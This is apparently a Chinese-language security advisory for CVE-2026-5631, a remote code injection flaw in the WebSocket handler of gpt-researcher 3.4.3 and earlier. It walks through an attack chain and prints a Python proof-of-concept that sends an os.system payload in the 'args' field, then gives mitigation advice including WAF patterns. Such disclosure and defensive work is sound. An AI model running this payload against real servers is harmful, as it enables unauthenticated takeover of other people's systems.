CVE-2026-5631 CVSS 7.3 高危

CVE-2026-5631 gpt-researcher代码注入漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5631

漏洞类型

代码注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

assafelovic gpt-researcher

漏洞概述

assafelovic gpt-researcher 版本3.4.3及以下存在严重的代码注入漏洞。该漏洞位于WebSocket端点的`extract_command_data`函数中，由于未对传入的`args`参数进行有效过滤，攻击者无需认证即可远程注入并执行恶意代码，从而完全控制服务器环境。

技术细节

漏洞核心在于`backend/server/server_utils.py`文件中的`extract_command_data`函数。该函数被设计用于处理WebSocket端点传入的参数，但在实现时直接使用了用户可控的`args`参数进行动态调用或代码构建，未进行任何消毒处理。攻击者可以通过构造包含恶意Python语法或系统命令的payload发送至WebSocket接口，触发服务端的代码注入。由于CVSS向量为AV:N/AC:L/PR:N/UI:N/S:U，该漏洞利用门槛低，攻击者可在无交互、无权限的情况下远程发起攻击，导致服务器被植入后门或数据泄露。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是 assafelovic/gpt-researcher 3.4.3 或更低版本，并定位其 WebSocket 端点。

STEP 2

构造载荷

攻击者构造包含恶意代码的 payload，将其放置在 `args` 参数中，例如利用 Python 的 `__import__('os').system('cmd')` 语法。

STEP 3

发送请求

攻击者通过 WebSocket 连接向受害者服务器发送特制的恶意数据包，无需任何身份验证。

STEP 4

代码执行

服务器端 `extract_command_data` 函数处理 `args` 参数时触发漏洞，解析并执行注入的恶意代码。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets
import json

# PoC for CVE-2026-5631: Code Injection in gpt-researcher
# This script demonstrates sending a malicious payload to the vulnerable endpoint.

async def exploit(target_url):
    uri = f"ws://{target_url}/ws" # Adjust endpoint based on actual implementation
    
    # Malicious payload attempting to inject code via 'args'
    # The payload aims to execute 'id' command on the server
    payload = {
        "args": "__import__('os').system('id')"
    }

    try:
        async with websockets.connect(uri) as websocket:
            print(f"[*] Connected to {uri}")
            # Send the malicious payload
            await websocket.send(json.dumps(payload))
            print("[+] Payload sent successfully.")
            
            # Wait for response (optional, depending on server behavior)
            response = await websocket.recv()
            print(f"[+] Server response: {response}")
            
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

# Usage: python3 poc.py <target_ip:port>
# asyncio.run(exploit("127.0.0.1:8000"))

影响范围

assafelovic gpt-researcher <= 3.4.3

防御指南

临时缓解措施

若无法立即升级，建议在网络层限制对 WebSocket 端口的访问，仅允许可信 IP 连接。同时，部署 Web 应用防火墙（WAF）规则，检测并拦截包含常见 Python 注入特征（如 `__import__`、`eval`、`os.system`）的流量数据包。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5631
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5631
3 Details https://www.cvedetails.com/cve/CVE-2026-5631/
4 VulDB https://vuldb.com/cve/CVE-2026-5631
5 Link https://github.com/assafelovic/gpt-researcher/
6 Link https://github.com/assafelovic/gpt-researcher/issues/1694
7 Link https://vuldb.com/submit/785858
8 Link https://vuldb.com/vuln/355419
9 Link https://vuldb.com/vuln/355419/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表